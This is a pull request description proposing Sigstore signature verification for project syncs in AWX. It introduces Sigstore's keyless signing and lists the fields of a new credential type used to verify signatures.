Verify Sigstore signature on project sync

[mayaCostantini]

SUMMARY

Introduce Sigstore signature verification for projects on update as part of the roadmap for Sigstore integration in the Ansible ecosystem.

What is Sigstore?

This section is a short introduction to project Sigstore. For more information, refer to the project documentation.

Project Sigstore is a new standard for signing, verifying and protecting software that solves the following issues:

• Key management: Sigstore solves the issue of private key storage and revocation by providing “keyless” signatures for software artifacts, eliminating the need for the user to store private GPG keys which could eventually become compromised.

• Identity-based signatures: Sigstore generates free, short-lived signing certificates based on identities, delegating the authentication part to an OIDC provider (Google, GitHub, Microsoft…).

• An immutable Transparency Log (Rekor) for signature and provenance attestations is used to store signature entries and facilitate verification and audits in case of identity compromise.

The Sigstore signature verification workflow for projects would exist in parallel with the current implementation for GPG signature verification.

Sigstore provides “keyless” signing for software artifacts, where a signer can connect to an OIDC provider and Sigstore will produce an ephemeral signing certificate and store a signature entry in an immutable transparency log queried during signature verification.

Changes introduced by this PR

This change allows to verify a project Sigstore signature, generated with ansible-sign (change to be supported in the CLI can be seen here) during a sync.

A new type of Credential sigstore is introduced to define the parameters for verifying a project signature:

• Rekor instance URL: The URL of the Sigstore Rekor instance the signatures were logged to
• TUF instance URL: The URL of the TUF instance used to retrieve Rekor and Fulcio public keys
• Rekor root public key: The PEM public key for the Rekor instance
• Fulcio certificate chain: Chain of PEM CA certificates to verify the Fulcio signing certificate
• Sigstore certificate identity: The OIDC identity of the signer to look for in the certificate SAN (i.e. email address, GitHub Actions workflow)
• Sigstore OIDC provider URL: The URL of the OIDC provider that issued the signer identity
• Sigstore GitHub Actions trigger: The GitHub Actions event name that triggered the workflow
• Sigstore git commit SHA: The git commit SHA that the workflow run was invoked with
• Sigstore GitHub workflow name: The name of the workflow that was triggered
• Sigstore GitHub repository: The repository slug that the workflow was triggered under
• Sigstore GitHub ref: The git ref that the workflow was invoked with
• Sigstore verify offline: Verify signatures offline (default: False)

Here is an overview of the configuration options for this type of credential:

When launching a project sync, if enabled, the job will look for a checksums manifest and for Sigstore signature materials under .ansible-sign/and will succeed only if the signature was successfully verified:

ISSUE TYPE

• New or Enhanced Feature

COMPONENT NAME

• API
• UI
• Collection
• Docs

AWX VERSION

awx: 22.3.1.dev72+g693541633a